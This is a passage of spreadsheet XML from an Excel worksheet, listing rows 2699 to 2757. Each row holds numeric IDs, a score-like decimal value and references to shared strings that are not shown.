      </c>
      <c r="G2699" t="s">
        <v>5333</v>
      </c>
      <c r="H2699" t="s">
        <v>5334</v>
      </c>
    </row>
    <row r="2700" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2700" s="1">
        <v>2698</v>
      </c>
      <c r="B2700">
        <v>2114</v>
      </c>
      <c r="C2700">
        <v>2114</v>
      </c>
      <c r="D2700">
        <v>1</v>
      </c>
      <c r="E2700">
        <v>0.86379998922348022</v>
      </c>
      <c r="F2700" t="s">
        <v>3911</v>
      </c>
      <c r="G2700" t="s">
        <v>5335</v>
      </c>
      <c r="H2700" t="s">
        <v>5336</v>
      </c>
    </row>
    <row r="2701" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2701" s="1">
        <v>2699</v>
      </c>
      <c r="B2701">
        <v>2115</v>
      </c>
      <c r="C2701">
        <v>2115</v>
      </c>
      <c r="D2701">
        <v>1</v>
      </c>
      <c r="E2701">
        <v>0.99559998512268066</v>
      </c>
      <c r="F2701" t="s">
        <v>3911</v>
      </c>
      <c r="G2701" t="s">
        <v>5337</v>
      </c>
      <c r="H2701" t="s">
        <v>5338</v>
      </c>
    </row>
    <row r="2702" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2702" s="1">
        <v>2700</v>
      </c>
      <c r="B2702">
        <v>4490</v>
      </c>
      <c r="C2702">
        <v>4490</v>
      </c>
      <c r="D2702">
        <v>1</v>
      </c>
      <c r="E2702">
        <v>0.99150002002716064</v>
      </c>
      <c r="F2702" t="s">
        <v>3911</v>
      </c>
      <c r="G2702" t="s">
        <v>5339</v>
      </c>
      <c r="H2702" t="s">
        <v>5340</v>
      </c>
    </row>
    <row r="2703" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2703" s="1">
        <v>2701</v>
      </c>
      <c r="B2703">
        <v>5495</v>
      </c>
      <c r="C2703">
        <v>5495</v>
      </c>
      <c r="D2703">
        <v>1</v>
      </c>
      <c r="E2703">
        <v>0.99839997291564941</v>
      </c>
      <c r="F2703" t="s">
        <v>3911</v>
      </c>
      <c r="G2703" t="s">
        <v>5341</v>
      </c>
      <c r="H2703" t="s">
        <v>5342</v>
      </c>
    </row>
    <row r="2704" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2704" s="1">
        <v>2702</v>
      </c>
      <c r="B2704">
        <v>2201</v>
      </c>
      <c r="C2704">
        <v>2201</v>
      </c>
      <c r="D2704">
        <v>1</v>
      </c>
      <c r="E2704">
        <v>0.99379998445510864</v>
      </c>
      <c r="F2704" t="s">
        <v>3911</v>
      </c>
      <c r="G2704" t="s">
        <v>5343</v>
      </c>
      <c r="H2704" t="s">
        <v>5344</v>
      </c>
    </row>
    <row r="2705" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2705" s="1">
        <v>2703</v>
      </c>
      <c r="B2705">
        <v>768</v>
      </c>
      <c r="C2705">
        <v>768</v>
      </c>
      <c r="D2705">
        <v>1</v>
      </c>
      <c r="E2705">
        <v>0.99570000171661377</v>
      </c>
      <c r="F2705" t="s">
        <v>3911</v>
      </c>
      <c r="G2705" t="s">
        <v>5345</v>
      </c>
      <c r="H2705" t="s">
        <v>5346</v>
      </c>
    </row>
    <row r="2706" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2706" s="1">
        <v>2704</v>
      </c>
      <c r="B2706">
        <v>3798</v>
      </c>
      <c r="C2706">
        <v>3798</v>
      </c>
      <c r="D2706">
        <v>1</v>
      </c>
      <c r="E2706">
        <v>0.52469998598098755</v>
      </c>
      <c r="F2706" t="s">
        <v>3911</v>
      </c>
      <c r="G2706" t="s">
        <v>5347</v>
      </c>
      <c r="H2706" t="s">
        <v>5348</v>
      </c>
    </row>
    <row r="2707" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2707" s="1">
        <v>2705</v>
      </c>
      <c r="B2707">
        <v>4371</v>
      </c>
      <c r="C2707">
        <v>4371</v>
      </c>
      <c r="D2707">
        <v>1</v>
      </c>
      <c r="E2707">
        <v>0.42070001363754272</v>
      </c>
      <c r="F2707" t="s">
        <v>3911</v>
      </c>
      <c r="G2707" t="s">
        <v>5349</v>
      </c>
      <c r="H2707" t="s">
        <v>5350</v>
      </c>
    </row>
    <row r="2708" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2708" s="1">
        <v>2706</v>
      </c>
      <c r="B2708">
        <v>3800</v>
      </c>
      <c r="C2708">
        <v>3800</v>
      </c>
      <c r="D2708">
        <v>1</v>
      </c>
      <c r="E2708">
        <v>0.50360000133514404</v>
      </c>
      <c r="F2708" t="s">
        <v>3911</v>
      </c>
      <c r="G2708" t="s">
        <v>5351</v>
      </c>
      <c r="H2708" t="s">
        <v>5352</v>
      </c>
    </row>
    <row r="2709" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2709" s="1">
        <v>2707</v>
      </c>
      <c r="B2709">
        <v>4368</v>
      </c>
      <c r="C2709">
        <v>4368</v>
      </c>
      <c r="D2709">
        <v>1</v>
      </c>
      <c r="E2709">
        <v>0.6403999924659729</v>
      </c>
      <c r="F2709" t="s">
        <v>3911</v>
      </c>
      <c r="G2709" t="s">
        <v>5353</v>
      </c>
      <c r="H2709" t="s">
        <v>5354</v>
      </c>
    </row>
    <row r="2710" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2710" s="1">
        <v>2708</v>
      </c>
      <c r="B2710">
        <v>5199</v>
      </c>
      <c r="C2710">
        <v>5199</v>
      </c>
      <c r="D2710">
        <v>1</v>
      </c>
      <c r="E2710">
        <v>0.52420002222061157</v>
      </c>
      <c r="F2710" t="s">
        <v>3911</v>
      </c>
      <c r="G2710" t="s">
        <v>5355</v>
      </c>
      <c r="H2710" t="s">
        <v>5356</v>
      </c>
    </row>
    <row r="2711" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2711" s="1">
        <v>2709</v>
      </c>
      <c r="B2711">
        <v>723</v>
      </c>
      <c r="C2711">
        <v>723</v>
      </c>
      <c r="D2711">
        <v>1</v>
      </c>
      <c r="E2711">
        <v>0.84700000286102295</v>
      </c>
      <c r="F2711" t="s">
        <v>3911</v>
      </c>
      <c r="G2711" t="s">
        <v>5357</v>
      </c>
      <c r="H2711" t="s">
        <v>5358</v>
      </c>
    </row>
    <row r="2712" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2712" s="1">
        <v>2710</v>
      </c>
      <c r="B2712">
        <v>4366</v>
      </c>
      <c r="C2712">
        <v>4366</v>
      </c>
      <c r="D2712">
        <v>1</v>
      </c>
      <c r="E2712">
        <v>0.99730002880096436</v>
      </c>
      <c r="F2712" t="s">
        <v>3911</v>
      </c>
      <c r="G2712" t="s">
        <v>5359</v>
      </c>
      <c r="H2712" t="s">
        <v>5360</v>
      </c>
    </row>
    <row r="2713" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2713" s="1">
        <v>2711</v>
      </c>
      <c r="B2713">
        <v>2286</v>
      </c>
      <c r="C2713">
        <v>2286</v>
      </c>
      <c r="D2713">
        <v>1</v>
      </c>
      <c r="E2713">
        <v>0.79250001907348633</v>
      </c>
      <c r="F2713" t="s">
        <v>3911</v>
      </c>
      <c r="G2713" t="s">
        <v>5361</v>
      </c>
      <c r="H2713" t="s">
        <v>5362</v>
      </c>
    </row>
    <row r="2714" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2714" s="1">
        <v>2712</v>
      </c>
      <c r="B2714">
        <v>3802</v>
      </c>
      <c r="C2714">
        <v>3802</v>
      </c>
      <c r="D2714">
        <v>1</v>
      </c>
      <c r="E2714">
        <v>0.65460002422332764</v>
      </c>
      <c r="F2714" t="s">
        <v>3911</v>
      </c>
      <c r="G2714" t="s">
        <v>5363</v>
      </c>
      <c r="H2714" t="s">
        <v>5364</v>
      </c>
    </row>
    <row r="2715" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2715" s="1">
        <v>2713</v>
      </c>
      <c r="B2715">
        <v>4358</v>
      </c>
      <c r="C2715">
        <v>4358</v>
      </c>
      <c r="D2715">
        <v>1</v>
      </c>
      <c r="E2715">
        <v>0.51990002393722534</v>
      </c>
      <c r="F2715" t="s">
        <v>3911</v>
      </c>
      <c r="G2715" t="s">
        <v>5365</v>
      </c>
      <c r="H2715" t="s">
        <v>5366</v>
      </c>
    </row>
    <row r="2716" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2716" s="1">
        <v>2714</v>
      </c>
      <c r="B2716">
        <v>3806</v>
      </c>
      <c r="C2716">
        <v>3806</v>
      </c>
      <c r="D2716">
        <v>1</v>
      </c>
      <c r="E2716">
        <v>0.44819998741149902</v>
      </c>
      <c r="F2716" t="s">
        <v>3911</v>
      </c>
      <c r="G2716" t="s">
        <v>5367</v>
      </c>
      <c r="H2716" t="s">
        <v>5368</v>
      </c>
    </row>
    <row r="2717" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2717" s="1">
        <v>2715</v>
      </c>
      <c r="B2717">
        <v>6892</v>
      </c>
      <c r="C2717">
        <v>6892</v>
      </c>
      <c r="D2717">
        <v>1</v>
      </c>
      <c r="E2717">
        <v>0.68480002880096436</v>
      </c>
      <c r="F2717" t="s">
        <v>3911</v>
      </c>
      <c r="G2717" t="s">
        <v>5369</v>
      </c>
      <c r="H2717" t="s">
        <v>5370</v>
      </c>
    </row>
    <row r="2718" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2718" s="1">
        <v>2716</v>
      </c>
      <c r="B2718">
        <v>2304</v>
      </c>
      <c r="C2718">
        <v>2304</v>
      </c>
      <c r="D2718">
        <v>1</v>
      </c>
      <c r="E2718">
        <v>0.90799999237060547</v>
      </c>
      <c r="F2718" t="s">
        <v>3911</v>
      </c>
      <c r="G2718" t="s">
        <v>5371</v>
      </c>
      <c r="H2718" t="s">
        <v>5372</v>
      </c>
    </row>
    <row r="2719" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2719" s="1">
        <v>2717</v>
      </c>
      <c r="B2719">
        <v>6061</v>
      </c>
      <c r="C2719">
        <v>6061</v>
      </c>
      <c r="D2719">
        <v>1</v>
      </c>
      <c r="E2719">
        <v>0.72769999504089355</v>
      </c>
      <c r="F2719" t="s">
        <v>3911</v>
      </c>
      <c r="G2719" t="s">
        <v>5373</v>
      </c>
      <c r="H2719" t="s">
        <v>5374</v>
      </c>
    </row>
    <row r="2720" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2720" s="1">
        <v>2718</v>
      </c>
      <c r="B2720">
        <v>710</v>
      </c>
      <c r="C2720">
        <v>710</v>
      </c>
      <c r="D2720">
        <v>1</v>
      </c>
      <c r="E2720">
        <v>0.7038000226020813</v>
      </c>
      <c r="F2720" t="s">
        <v>3911</v>
      </c>
      <c r="G2720" t="s">
        <v>5375</v>
      </c>
      <c r="H2720" t="s">
        <v>5376</v>
      </c>
    </row>
    <row r="2721" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2721" s="1">
        <v>2719</v>
      </c>
      <c r="B2721">
        <v>2311</v>
      </c>
      <c r="C2721">
        <v>2311</v>
      </c>
      <c r="D2721">
        <v>1</v>
      </c>
      <c r="E2721">
        <v>0.64749997854232788</v>
      </c>
      <c r="F2721" t="s">
        <v>3911</v>
      </c>
      <c r="G2721" t="s">
        <v>5377</v>
      </c>
      <c r="H2721" t="s">
        <v>5378</v>
      </c>
    </row>
    <row r="2722" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2722" s="1">
        <v>2720</v>
      </c>
      <c r="B2722">
        <v>708</v>
      </c>
      <c r="C2722">
        <v>708</v>
      </c>
      <c r="D2722">
        <v>1</v>
      </c>
      <c r="E2722">
        <v>0.98430001735687256</v>
      </c>
      <c r="F2722" t="s">
        <v>3911</v>
      </c>
      <c r="G2722" t="s">
        <v>5379</v>
      </c>
      <c r="H2722" t="s">
        <v>5380</v>
      </c>
    </row>
    <row r="2723" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2723" s="1">
        <v>2721</v>
      </c>
      <c r="B2723">
        <v>3293</v>
      </c>
      <c r="C2723">
        <v>3293</v>
      </c>
      <c r="D2723">
        <v>1</v>
      </c>
      <c r="E2723">
        <v>0.99860000610351563</v>
      </c>
      <c r="F2723" t="s">
        <v>3911</v>
      </c>
      <c r="G2723" t="s">
        <v>5381</v>
      </c>
      <c r="H2723" t="s">
        <v>5382</v>
      </c>
    </row>
    <row r="2724" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2724" s="1">
        <v>2722</v>
      </c>
      <c r="B2724">
        <v>705</v>
      </c>
      <c r="C2724">
        <v>705</v>
      </c>
      <c r="D2724">
        <v>1</v>
      </c>
      <c r="E2724">
        <v>0.35319998860359192</v>
      </c>
      <c r="F2724" t="s">
        <v>3911</v>
      </c>
      <c r="G2724" t="s">
        <v>5383</v>
      </c>
      <c r="H2724" t="s">
        <v>5384</v>
      </c>
    </row>
    <row r="2725" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2725" s="1">
        <v>2723</v>
      </c>
      <c r="B2725">
        <v>4350</v>
      </c>
      <c r="C2725">
        <v>4350</v>
      </c>
      <c r="D2725">
        <v>1</v>
      </c>
      <c r="E2725">
        <v>0.99889999628067017</v>
      </c>
      <c r="F2725" t="s">
        <v>3911</v>
      </c>
      <c r="G2725" t="s">
        <v>5385</v>
      </c>
      <c r="H2725" t="s">
        <v>5386</v>
      </c>
    </row>
    <row r="2726" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2726" s="1">
        <v>2724</v>
      </c>
      <c r="B2726">
        <v>2322</v>
      </c>
      <c r="C2726">
        <v>2322</v>
      </c>
      <c r="D2726">
        <v>1</v>
      </c>
      <c r="E2726">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2726" t="s">
        <v>3911</v>
      </c>
      <c r="G2726" t="s">
        <v>5387</v>
      </c>
      <c r="H2726" t="s">
        <v>5388</v>
      </c>
    </row>
    <row r="2727" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2727" s="1">
        <v>2725</v>
      </c>
      <c r="B2727">
        <v>2323</v>
      </c>
      <c r="C2727">
        <v>2323</v>
      </c>
      <c r="D2727">
        <v>1</v>
      </c>
      <c r="E2727">
        <v>0.99800002574920654</v>
      </c>
      <c r="F2727" t="s">
        <v>3911</v>
      </c>
      <c r="G2727" t="s">
        <v>5389</v>
      </c>
      <c r="H2727" t="s">
        <v>5390</v>
      </c>
    </row>
    <row r="2728" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2728" s="1">
        <v>2726</v>
      </c>
      <c r="B2728">
        <v>222</v>
      </c>
      <c r="C2728">
        <v>222</v>
      </c>
      <c r="D2728">
        <v>1</v>
      </c>
      <c r="E2728">
        <v>0.84409999847412109</v>
      </c>
      <c r="F2728" t="s">
        <v>3911</v>
      </c>
      <c r="G2728" t="s">
        <v>5391</v>
      </c>
      <c r="H2728" t="s">
        <v>5392</v>
      </c>
    </row>
    <row r="2729" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2729" s="1">
        <v>2727</v>
      </c>
      <c r="B2729">
        <v>3289</v>
      </c>
      <c r="C2729">
        <v>3289</v>
      </c>
      <c r="D2729">
        <v>1</v>
      </c>
      <c r="E2729">
        <v>0.65539997816085815</v>
      </c>
      <c r="F2729" t="s">
        <v>3911</v>
      </c>
      <c r="G2729" t="s">
        <v>5393</v>
      </c>
      <c r="H2729" t="s">
        <v>5394</v>
      </c>
    </row>
    <row r="2730" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2730" s="1">
        <v>2728</v>
      </c>
      <c r="B2730">
        <v>2331</v>
      </c>
      <c r="C2730">
        <v>2331</v>
      </c>
      <c r="D2730">
        <v>1</v>
      </c>
      <c r="E2730">
        <v>0.56639999151229858</v>
      </c>
      <c r="F2730" t="s">
        <v>3911</v>
      </c>
      <c r="G2730" t="s">
        <v>5395</v>
      </c>
      <c r="H2730" t="s">
        <v>5396</v>
      </c>
    </row>
    <row r="2731" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2731" s="1">
        <v>2729</v>
      </c>
      <c r="B2731">
        <v>225</v>
      </c>
      <c r="C2731">
        <v>225</v>
      </c>
      <c r="D2731">
        <v>1</v>
      </c>
      <c r="E2731">
        <v>0.6054999828338623</v>
      </c>
      <c r="F2731" t="s">
        <v>3911</v>
      </c>
      <c r="G2731" t="s">
        <v>5397</v>
      </c>
      <c r="H2731" t="s">
        <v>5398</v>
      </c>
    </row>
    <row r="2732" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2732" s="1">
        <v>2730</v>
      </c>
      <c r="B2732">
        <v>226</v>
      </c>
      <c r="C2732">
        <v>226</v>
      </c>
      <c r="D2732">
        <v>1</v>
      </c>
      <c r="E2732">
        <v>0.48260000348091131</v>
      </c>
      <c r="F2732" t="s">
        <v>3911</v>
      </c>
      <c r="G2732" t="s">
        <v>5399</v>
      </c>
      <c r="H2732" t="s">
        <v>5400</v>
      </c>
    </row>
    <row r="2733" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2733" s="1">
        <v>2731</v>
      </c>
      <c r="B2733">
        <v>3280</v>
      </c>
      <c r="C2733">
        <v>3280</v>
      </c>
      <c r="D2733">
        <v>1</v>
      </c>
      <c r="E2733">
        <v>0.99519997835159302</v>
      </c>
      <c r="F2733" t="s">
        <v>3911</v>
      </c>
      <c r="G2733" t="s">
        <v>5401</v>
      </c>
      <c r="H2733" t="s">
        <v>5402</v>
      </c>
    </row>
    <row r="2734" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2734" s="1">
        <v>2732</v>
      </c>
      <c r="B2734">
        <v>2310</v>
      </c>
      <c r="C2734">
        <v>2310</v>
      </c>
      <c r="D2734">
        <v>1</v>
      </c>
      <c r="E2734">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2734" t="s">
        <v>3911</v>
      </c>
      <c r="G2734" t="s">
        <v>5403</v>
      </c>
      <c r="H2734" t="s">
        <v>5404</v>
      </c>
    </row>
    <row r="2735" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2735" s="1">
        <v>2733</v>
      </c>
      <c r="B2735">
        <v>769</v>
      </c>
      <c r="C2735">
        <v>769</v>
      </c>
      <c r="D2735">
        <v>1</v>
      </c>
      <c r="E2735">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2735" t="s">
        <v>3911</v>
      </c>
      <c r="G2735" t="s">
        <v>5405</v>
      </c>
      <c r="H2735" t="s">
        <v>5406</v>
      </c>
    </row>
    <row r="2736" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2736" s="1">
        <v>2734</v>
      </c>
      <c r="B2736">
        <v>4378</v>
      </c>
      <c r="C2736">
        <v>4378</v>
      </c>
      <c r="D2736">
        <v>1</v>
      </c>
      <c r="E2736">
        <v>0.99730002880096436</v>
      </c>
      <c r="F2736" t="s">
        <v>3911</v>
      </c>
      <c r="G2736" t="s">
        <v>5407</v>
      </c>
      <c r="H2736" t="s">
        <v>5408</v>
      </c>
    </row>
    <row r="2737" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2737" s="1">
        <v>2735</v>
      </c>
      <c r="B2737">
        <v>3792</v>
      </c>
      <c r="C2737">
        <v>3792</v>
      </c>
      <c r="D2737">
        <v>1</v>
      </c>
      <c r="E2737">
        <v>0.68110001087188721</v>
      </c>
      <c r="F2737" t="s">
        <v>3911</v>
      </c>
      <c r="G2737" t="s">
        <v>5409</v>
      </c>
      <c r="H2737" t="s">
        <v>5410</v>
      </c>
    </row>
    <row r="2738" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2738" s="1">
        <v>2736</v>
      </c>
      <c r="B2738">
        <v>5465</v>
      </c>
      <c r="C2738">
        <v>5465</v>
      </c>
      <c r="D2738">
        <v>1</v>
      </c>
      <c r="E2738">
        <v>0.580299973487854</v>
      </c>
      <c r="F2738" t="s">
        <v>3911</v>
      </c>
      <c r="G2738" t="s">
        <v>5411</v>
      </c>
      <c r="H2738" t="s">
        <v>5412</v>
      </c>
    </row>
    <row r="2739" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2739" s="1">
        <v>2737</v>
      </c>
      <c r="B2739">
        <v>5179</v>
      </c>
      <c r="C2739">
        <v>5179</v>
      </c>
      <c r="D2739">
        <v>1</v>
      </c>
      <c r="E2739">
        <v>0.49470001459121699</v>
      </c>
      <c r="F2739" t="s">
        <v>3911</v>
      </c>
      <c r="G2739" t="s">
        <v>5413</v>
      </c>
      <c r="H2739" t="s">
        <v>5414</v>
      </c>
    </row>
    <row r="2740" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2740" s="1">
        <v>2738</v>
      </c>
      <c r="B2740">
        <v>6471</v>
      </c>
      <c r="C2740">
        <v>6471</v>
      </c>
      <c r="D2740">
        <v>1</v>
      </c>
      <c r="E2740">
        <v>0.9868999719619751</v>
      </c>
      <c r="F2740" t="s">
        <v>3911</v>
      </c>
      <c r="G2740" t="s">
        <v>5415</v>
      </c>
      <c r="H2740" t="s">
        <v>5416</v>
      </c>
    </row>
    <row r="2741" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2741" s="1">
        <v>2739</v>
      </c>
      <c r="B2741">
        <v>5743</v>
      </c>
      <c r="C2741">
        <v>5743</v>
      </c>
      <c r="D2741">
        <v>1</v>
      </c>
      <c r="E2741">
        <v>0.48440000414848328</v>
      </c>
      <c r="F2741" t="s">
        <v>3911</v>
      </c>
      <c r="G2741" t="s">
        <v>5417</v>
      </c>
      <c r="H2741" t="s">
        <v>4771</v>
      </c>
    </row>
    <row r="2742" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2742" s="1">
        <v>2740</v>
      </c>
      <c r="B2742">
        <v>2215</v>
      </c>
      <c r="C2742">
        <v>2215</v>
      </c>
      <c r="D2742">
        <v>1</v>
      </c>
      <c r="E2742">
        <v>0.63380002975463867</v>
      </c>
      <c r="F2742" t="s">
        <v>3911</v>
      </c>
      <c r="G2742" t="s">
        <v>5418</v>
      </c>
      <c r="H2742" t="s">
        <v>5419</v>
      </c>
    </row>
    <row r="2743" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2743" s="1">
        <v>2741</v>
      </c>
      <c r="B2743">
        <v>755</v>
      </c>
      <c r="C2743">
        <v>755</v>
      </c>
      <c r="D2743">
        <v>1</v>
      </c>
      <c r="E2743">
        <v>0.99790000915527344</v>
      </c>
      <c r="F2743" t="s">
        <v>3911</v>
      </c>
      <c r="G2743" t="s">
        <v>5420</v>
      </c>
      <c r="H2743" t="s">
        <v>5421</v>
      </c>
    </row>
    <row r="2744" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2744" s="1">
        <v>2742</v>
      </c>
      <c r="B2744">
        <v>5463</v>
      </c>
      <c r="C2744">
        <v>5463</v>
      </c>
      <c r="D2744">
        <v>1</v>
      </c>
      <c r="E2744">
        <v>0.76120001077651978</v>
      </c>
      <c r="F2744" t="s">
        <v>3911</v>
      </c>
      <c r="G2744" t="s">
        <v>5422</v>
      </c>
      <c r="H2744" t="s">
        <v>5423</v>
      </c>
    </row>
    <row r="2745" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2745" s="1">
        <v>2743</v>
      </c>
      <c r="B2745">
        <v>4401</v>
      </c>
      <c r="C2745">
        <v>4401</v>
      </c>
      <c r="D2745">
        <v>1</v>
      </c>
      <c r="E2745">
        <v>0.40939998626708979</v>
      </c>
      <c r="F2745" t="s">
        <v>3911</v>
      </c>
      <c r="G2745" t="s">
        <v>5424</v>
      </c>
      <c r="H2745" t="s">
        <v>5425</v>
      </c>
    </row>
    <row r="2746" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2746" s="1">
        <v>2744</v>
      </c>
      <c r="B2746">
        <v>4398</v>
      </c>
      <c r="C2746">
        <v>4398</v>
      </c>
      <c r="D2746">
        <v>1</v>
      </c>
      <c r="E2746">
        <v>0.94539999961853027</v>
      </c>
      <c r="F2746" t="s">
        <v>3911</v>
      </c>
      <c r="G2746" t="s">
        <v>5426</v>
      </c>
      <c r="H2746" t="s">
        <v>5427</v>
      </c>
    </row>
    <row r="2747" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2747" s="1">
        <v>2745</v>
      </c>
      <c r="B2747">
        <v>4397</v>
      </c>
      <c r="C2747">
        <v>4397</v>
      </c>
      <c r="D2747">
        <v>1</v>
      </c>
      <c r="E2747">
        <v>0.99830001592636108</v>
      </c>
      <c r="F2747" t="s">
        <v>3911</v>
      </c>
      <c r="G2747" t="s">
        <v>5428</v>
      </c>
      <c r="H2747" t="s">
        <v>5429</v>
      </c>
    </row>
    <row r="2748" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2748" s="1">
        <v>2746</v>
      </c>
      <c r="B2748">
        <v>4396</v>
      </c>
      <c r="C2748">
        <v>4396</v>
      </c>
      <c r="D2748">
        <v>1</v>
      </c>
      <c r="E2748">
        <v>0.73739999532699585</v>
      </c>
      <c r="F2748" t="s">
        <v>3911</v>
      </c>
      <c r="G2748" t="s">
        <v>5430</v>
      </c>
      <c r="H2748" t="s">
        <v>5431</v>
      </c>
    </row>
    <row r="2749" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2749" s="1">
        <v>2747</v>
      </c>
      <c r="B2749">
        <v>6054</v>
      </c>
      <c r="C2749">
        <v>6054</v>
      </c>
      <c r="D2749">
        <v>1</v>
      </c>
      <c r="E2749">
        <v>0.99870002269744873</v>
      </c>
      <c r="F2749" t="s">
        <v>3911</v>
      </c>
      <c r="G2749" t="s">
        <v>5432</v>
      </c>
      <c r="H2749" t="s">
        <v>5433</v>
      </c>
    </row>
    <row r="2750" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2750" s="1">
        <v>2748</v>
      </c>
      <c r="B2750">
        <v>4394</v>
      </c>
      <c r="C2750">
        <v>4394</v>
      </c>
      <c r="D2750">
        <v>1</v>
      </c>
      <c r="E2750">
        <v>0.96799999475479126</v>
      </c>
      <c r="F2750" t="s">
        <v>3911</v>
      </c>
      <c r="G2750" t="s">
        <v>5434</v>
      </c>
      <c r="H2750" t="s">
        <v>5435</v>
      </c>
    </row>
    <row r="2751" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2751" s="1">
        <v>2749</v>
      </c>
      <c r="B2751">
        <v>7833</v>
      </c>
      <c r="C2751">
        <v>7833</v>
      </c>
      <c r="D2751">
        <v>1</v>
      </c>
      <c r="E2751">
        <v>0.62269997596740723</v>
      </c>
      <c r="F2751" t="s">
        <v>3911</v>
      </c>
      <c r="G2751" t="s">
        <v>5436</v>
      </c>
      <c r="H2751" t="s">
        <v>5437</v>
      </c>
    </row>
    <row r="2752" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2752" s="1">
        <v>2750</v>
      </c>
      <c r="B2752">
        <v>3328</v>
      </c>
      <c r="C2752">
        <v>3328</v>
      </c>
      <c r="D2752">
        <v>1</v>
      </c>
      <c r="E2752">
        <v>0.52329999208450317</v>
      </c>
      <c r="F2752" t="s">
        <v>3911</v>
      </c>
      <c r="G2752" t="s">
        <v>5438</v>
      </c>
      <c r="H2752" t="s">
        <v>5439</v>
      </c>
    </row>
    <row r="2753" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2753" s="1">
        <v>2751</v>
      </c>
      <c r="B2753">
        <v>6921</v>
      </c>
      <c r="C2753">
        <v>6921</v>
      </c>
      <c r="D2753">
        <v>1</v>
      </c>
      <c r="E2753">
        <v>0.99610000848770142</v>
      </c>
      <c r="F2753" t="s">
        <v>3911</v>
      </c>
      <c r="G2753" t="s">
        <v>5440</v>
      </c>
      <c r="H2753" t="s">
        <v>5441</v>
      </c>
    </row>
    <row r="2754" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2754" s="1">
        <v>2752</v>
      </c>
      <c r="B2754">
        <v>4390</v>
      </c>
      <c r="C2754">
        <v>4390</v>
      </c>
      <c r="D2754">
        <v>1</v>
      </c>
      <c r="E2754">
        <v>0.43329998850822449</v>
      </c>
      <c r="F2754" t="s">
        <v>3911</v>
      </c>
      <c r="G2754" t="s">
        <v>5442</v>
      </c>
      <c r="H2754" t="s">
        <v>5443</v>
      </c>
    </row>
    <row r="2755" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2755" s="1">
        <v>2753</v>
      </c>
      <c r="B2755">
        <v>6918</v>
      </c>
      <c r="C2755">
        <v>6918</v>
      </c>
      <c r="D2755">
        <v>1</v>
      </c>
      <c r="E2755">
        <v>0.83869999647140503</v>
      </c>
      <c r="F2755" t="s">
        <v>3911</v>
      </c>
      <c r="G2755" t="s">
        <v>5444</v>
      </c>
      <c r="H2755" t="s">
        <v>5445</v>
      </c>
    </row>
    <row r="2756" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2756" s="1">
        <v>2754</v>
      </c>
      <c r="B2756">
        <v>2243</v>
      </c>
      <c r="C2756">
        <v>2243</v>
      </c>
      <c r="D2756">
        <v>1</v>
      </c>
      <c r="E2756">
        <v>0.70660001039505005</v>
      </c>
      <c r="F2756" t="s">
        <v>3911</v>
      </c>
      <c r="G2756" t="s">
        <v>5446</v>
      </c>
      <c r="H2756" t="s">
        <v>5447</v>
      </c>
    </row>
    <row r="2757" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2757" s="1">
        <v>2755</v>
      </c>
      <c r="B2757">
        <v>6917</v>
      </c>
      <c r="C2757">
        <v>6917</v>
      </c>
      <c r="D2757">
        <v>1</v>
      </c>
      <c r="E2757">
        <v>0.99659997224807739</v>
      </c>
      <c r="F2757" t="s">
        <v>3911</v>
      </c>
      <c r="G2757" t="s">
        <v>5448</v>
      </c>
      <c r="H2757" t="s">
        <v>5449</v>
      </c>
    </row>
    <row r="2758" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2758" s="1">
